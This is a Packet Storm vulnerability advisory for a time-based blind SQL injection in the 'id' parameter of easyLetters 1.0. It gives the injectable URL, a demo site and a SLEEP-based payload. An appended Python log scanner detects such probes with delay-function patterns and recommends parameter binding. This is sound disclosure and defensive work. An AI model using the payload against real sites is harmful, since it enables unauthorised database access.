easyLetters 1.0 SQL Injection

2018-05-26T00:00:00
ID PACKETSTORM:147898
Type packetstorm
Reporter Ozkan Mustafa Akkus
Modified 2018-05-26T00:00:00

Description

                                        
`# Exploit Title: easyLetters 1.0 - 'id' SQL Injection  
# Dork: N/A  
# Date: 25.05.2018  
# Exploit Author: Ozkan Mustafa Akkus (AkkuS)  
# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396  
# Version: 1.0  
# Category: Webapps  
# Tested on: Kali Linux  
====================================================  
# Demo : http://pauloreg.com/newsletter/  
# PoC : SQLi :  
  
http://test.com/newsletter/e-mails.php?id=[SQLi]  
  
Parameter: id (GET)  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: id=1 AND SLEEP(5)  
  
====================================================  
  
`
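
A defender-side check for the pattern reported above, added here as an example and not part of the original advisory: it scans web access logs for requests to `e-mails.php` whose `id` value is not a plain integer, and tags those that carry a delay function such as `SLEEP(`. The combined log format, the sample lines and the names `scan`, `SAMPLE_LOG`, `INT_RE` and `DELAY_RE` are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [25/May/2018:10:00:01 +0000] "GET /newsletter/e-mails.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.44 - - [25/May/2018:10:00:09 +0000] "GET /newsletter/e-mails.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "curl/7.58"
203.0.113.44 - - [25/May/2018:10:00:20 +0000] "GET /newsletter/e-mails.php?id=1+and+sl%65ep%285%29 HTTP/1.1" 200 5120 "-" "curl/7.58"
203.0.113.21 - - [25/May/2018:10:00:31 +0000] "GET /newsletter/e-mails.php?id=7%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.12 - - [25/May/2018:10:01:00 +0000] "GET /newsletter/index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.15 - - [25/May/2018:10:02:00 +0000] "GET /newsletter/e-mails.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r'[0-9]{1,10}')                      # the only shape a record id should have
DELAY_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)


def scan(log_text, script="/e-mails.php", param="id"):
    """Return (client_ip, kind, decoded_value) for every suspicious `param` value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith(script):
            continue
        # parse_qs percent-decodes, so encoded variants are compared in clear form.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if INT_RE.fullmatch(value):
                continue
            kind = "time-based" if DELAY_RE.search(value) else "non-integer"
            findings.append((m.group("ip"), kind, value))
    return findings


if __name__ == "__main__":
    for ip, kind, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{value!r}")
```

Log matching only surfaces probing of the parameter; the fix belongs in the application, which should cast `id` to an integer or bind it as a query parameter instead of concatenating it into the SQL statement.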